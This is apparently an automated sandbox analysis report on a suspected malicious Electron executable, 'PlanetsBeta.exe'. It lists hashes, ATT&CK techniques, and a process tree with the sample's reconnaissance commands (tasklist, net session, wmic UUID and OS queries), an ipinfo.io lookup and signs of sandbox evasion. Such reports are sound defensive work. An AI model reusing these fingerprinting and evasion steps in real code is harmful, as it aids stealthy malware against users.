894c46b031cc83e8403cc2f81215ca4fb38ef9725409c0c385637f5a45c03962

Analysis

max time kernel
56s
max time network
169s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
14/01/2024, 12:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PlanetsBeta.exe
Size

139.5MB
MD5

ffd70cd22ce1e72d24a75763301b73ba
SHA1

cdfafef2ab213946efffc543b3fbd69d1fc24339
SHA256

f72c07820e5db527d6f12355900344edc6b29c86af80f934a5d92b7fa43e82f0
SHA512

4067c5533da72c07c331588ef49ce1867b0d016537c204f51e236e1468e6099e8f1046afdbe7c8ad05d3ddc203944a7afec3e714a1ceefe60ff3a26a82185000
SSDEEP

786432:n14w5ThzHwQBgmoLWv+K18nCzKdo5DTdvfMQr6SSmPuvh8tSIW68:n14kpHwQjCWv+K18CedmVvEQEpcJW

Score

7^/10

Malware Config

Signatures

Loads dropped DLL 3 IoCs

pid	Process
1888	PlanetsBeta.exe
1888	PlanetsBeta.exe
1888	PlanetsBeta.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
36	ipinfo.io
37	ipinfo.io
69	ipinfo.io
70	ipinfo.io
71	ipinfo.io

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	PlanetsBeta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	PlanetsBeta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	PlanetsBeta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	PlanetsBeta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	PlanetsBeta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PlanetsBeta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PlanetsBeta.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
856	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5944	WMIC.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

pid	Process
1872	tasklist.exe
8352	tasklist.exe
7864	tasklist.exe
7788	tasklist.exe
7764	tasklist.exe
8600	tasklist.exe
8472	tasklist.exe
8208	tasklist.exe
8088	tasklist.exe
8072	tasklist.exe
7996	tasklist.exe
8880	tasklist.exe
8692	tasklist.exe
7952	tasklist.exe
7896	tasklist.exe
7780	tasklist.exe
8464	tasklist.exe
9320	tasklist.exe
8188	tasklist.exe
8104	tasklist.exe
7968	tasklist.exe
8676	tasklist.exe
8344	tasklist.exe
7804	tasklist.exe
7920	tasklist.exe
7796	tasklist.exe
8660	tasklist.exe
8644	tasklist.exe
8628	tasklist.exe
8568	tasklist.exe
8280	tasklist.exe
8264	tasklist.exe
8080	tasklist.exe
8684	tasklist.exe
8652	tasklist.exe
8608	tasklist.exe
8272	tasklist.exe
8580	tasklist.exe
7852	tasklist.exe
7904	tasklist.exe
8044	tasklist.exe
8196	tasklist.exe
8128	tasklist.exe
8928	tasklist.exe
8224	tasklist.exe
8844	tasklist.exe
8528	tasklist.exe
8936	tasklist.exe
8888	tasklist.exe
7960	tasklist.exe
8136	tasklist.exe
8064	tasklist.exe
8056	tasklist.exe
8028	tasklist.exe
8944	tasklist.exe
8508	tasklist.exe
7844	tasklist.exe
7836	tasklist.exe
7828	tasklist.exe
8448	tasklist.exe
8292	tasklist.exe
8036	tasklist.exe
8020	tasklist.exe
8820	tasklist.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1888	PlanetsBeta.exe
1888	PlanetsBeta.exe
1888	PlanetsBeta.exe
1888	PlanetsBeta.exe
1400	PlanetsBeta.exe
1400	PlanetsBeta.exe
10804	powershell.exe
10804	powershell.exe
10804	powershell.exe
8460	powershell.exe
8460	powershell.exe
8460	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1872	tasklist.exe
Token: SeIncreaseQuotaPrivilege	868	cmd.exe
Token: SeSecurityPrivilege	868	cmd.exe
Token: SeTakeOwnershipPrivilege	868	cmd.exe
Token: SeLoadDriverPrivilege	868	cmd.exe
Token: SeSystemProfilePrivilege	868	cmd.exe
Token: SeSystemtimePrivilege	868	cmd.exe
Token: SeProfSingleProcessPrivilege	868	cmd.exe
Token: SeIncBasePriorityPrivilege	868	cmd.exe
Token: SeCreatePagefilePrivilege	868	cmd.exe
Token: SeBackupPrivilege	868	cmd.exe
Token: SeRestorePrivilege	868	cmd.exe
Token: SeShutdownPrivilege	868	cmd.exe
Token: SeDebugPrivilege	868	cmd.exe
Token: SeSystemEnvironmentPrivilege	868	cmd.exe
Token: SeRemoteShutdownPrivilege	868	cmd.exe
Token: SeUndockPrivilege	868	cmd.exe
Token: SeManageVolumePrivilege	868	cmd.exe
Token: 33	868	cmd.exe
Token: 34	868	cmd.exe
Token: 35	868	cmd.exe
Token: 36	868	cmd.exe
Token: SeIncreaseQuotaPrivilege	868	cmd.exe
Token: SeSecurityPrivilege	868	cmd.exe
Token: SeTakeOwnershipPrivilege	868	cmd.exe
Token: SeLoadDriverPrivilege	868	cmd.exe
Token: SeSystemProfilePrivilege	868	cmd.exe
Token: SeSystemtimePrivilege	868	cmd.exe
Token: SeProfSingleProcessPrivilege	868	cmd.exe
Token: SeIncBasePriorityPrivilege	868	cmd.exe
Token: SeCreatePagefilePrivilege	868	cmd.exe
Token: SeBackupPrivilege	868	cmd.exe
Token: SeRestorePrivilege	868	cmd.exe
Token: SeShutdownPrivilege	868	cmd.exe
Token: SeDebugPrivilege	868	cmd.exe
Token: SeSystemEnvironmentPrivilege	868	cmd.exe
Token: SeRemoteShutdownPrivilege	868	cmd.exe
Token: SeUndockPrivilege	868	cmd.exe
Token: SeManageVolumePrivilege	868	cmd.exe
Token: 33	868	cmd.exe
Token: 34	868	cmd.exe
Token: 35	868	cmd.exe
Token: 36	868	cmd.exe
Token: SeShutdownPrivilege	1888	PlanetsBeta.exe
Token: SeCreatePagefilePrivilege	1888	PlanetsBeta.exe
Token: SeShutdownPrivilege	1888	PlanetsBeta.exe
Token: SeCreatePagefilePrivilege	1888	PlanetsBeta.exe
Token: SeDebugPrivilege	7692	tasklist.exe
Token: SeDebugPrivilege	7996	tasklist.exe
Token: SeShutdownPrivilege	1888	PlanetsBeta.exe
Token: SeCreatePagefilePrivilege	1888	PlanetsBeta.exe
Token: SeDebugPrivilege	7852	tasklist.exe
Token: SeDebugPrivilege	7764	tasklist.exe
Token: SeDebugPrivilege	8004	tasklist.exe
Token: SeDebugPrivilege	7796	tasklist.exe
Token: SeDebugPrivilege	8152	tasklist.exe
Token: SeDebugPrivilege	7864	tasklist.exe
Token: SeDebugPrivilege	7788	tasklist.exe
Token: SeDebugPrivilege	7804	tasklist.exe
Token: SeDebugPrivilege	7960	tasklist.exe
Token: SeDebugPrivilege	8028	tasklist.exe
Token: SeDebugPrivilege	7968	tasklist.exe
Token: SeDebugPrivilege	7980	tasklist.exe
Token: SeDebugPrivilege	7836	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1888 wrote to memory of 5020	1888	PlanetsBeta.exe	89
PID 1888 wrote to memory of 5020	1888	PlanetsBeta.exe	89
PID 5020 wrote to memory of 1872	5020	cmd.exe	91
PID 5020 wrote to memory of 1872	5020	cmd.exe	91
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 4296	1888	PlanetsBeta.exe	92
PID 1888 wrote to memory of 1400	1888	PlanetsBeta.exe	94
PID 1888 wrote to memory of 1400	1888	PlanetsBeta.exe	94
PID 1888 wrote to memory of 3172	1888	PlanetsBeta.exe	96
PID 1888 wrote to memory of 3172	1888	PlanetsBeta.exe	96
PID 3172 wrote to memory of 868	3172	cmd.exe	115
PID 3172 wrote to memory of 868	3172	cmd.exe	115
PID 1888 wrote to memory of 4604	1888	PlanetsBeta.exe	112
PID 1888 wrote to memory of 4604	1888	PlanetsBeta.exe	112
PID 1888 wrote to memory of 5100	1888	PlanetsBeta.exe	111
PID 1888 wrote to memory of 5100	1888	PlanetsBeta.exe	111
PID 1888 wrote to memory of 560	1888	PlanetsBeta.exe	110
PID 1888 wrote to memory of 560	1888	PlanetsBeta.exe	110
PID 1888 wrote to memory of 5016	1888	PlanetsBeta.exe	109
PID 1888 wrote to memory of 5016	1888	PlanetsBeta.exe	109
PID 1888 wrote to memory of 3556	1888	PlanetsBeta.exe	108
PID 1888 wrote to memory of 3556	1888	PlanetsBeta.exe	108
PID 1888 wrote to memory of 3512	1888	PlanetsBeta.exe	106
PID 1888 wrote to memory of 3512	1888	PlanetsBeta.exe	106
PID 1888 wrote to memory of 3092	1888	PlanetsBeta.exe	105
PID 1888 wrote to memory of 3092	1888	PlanetsBeta.exe	105

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
8100	attrib.exe

C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe
"C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe"
1⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5020
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1872
- C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe
  "C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1728,10780680055874431263,4156419963185918940,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  PID:4296
- C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe
  "C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1964 --field-trial-handle=1728,10780680055874431263,4156419963185918940,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1888 get ExecutablePath"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3172
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where processid=1888 get ExecutablePath
    3⤵
    PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3024
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2172
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3680
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1392
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3564
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3092
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3512
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4168
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3556
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5016
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:560
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5100
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:8004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4604
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2260
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:868
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3500
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5116
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:8028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1376
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4564
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4848
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2544
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4960
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2340
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4760
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4916
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3820
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:908
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3596
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:224
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3672
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4388
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "net session"
  2⤵
  PID:5900
- - C:\Windows\system32\net.exe
    net session
    3⤵
    PID:8392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
  2⤵
  PID:5952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:5940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\resources\app.asar.unpacked\bind\main.exe"
  2⤵
  PID:5916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:32
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:8
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:740
- C:\Windows\system32\cmd.exe
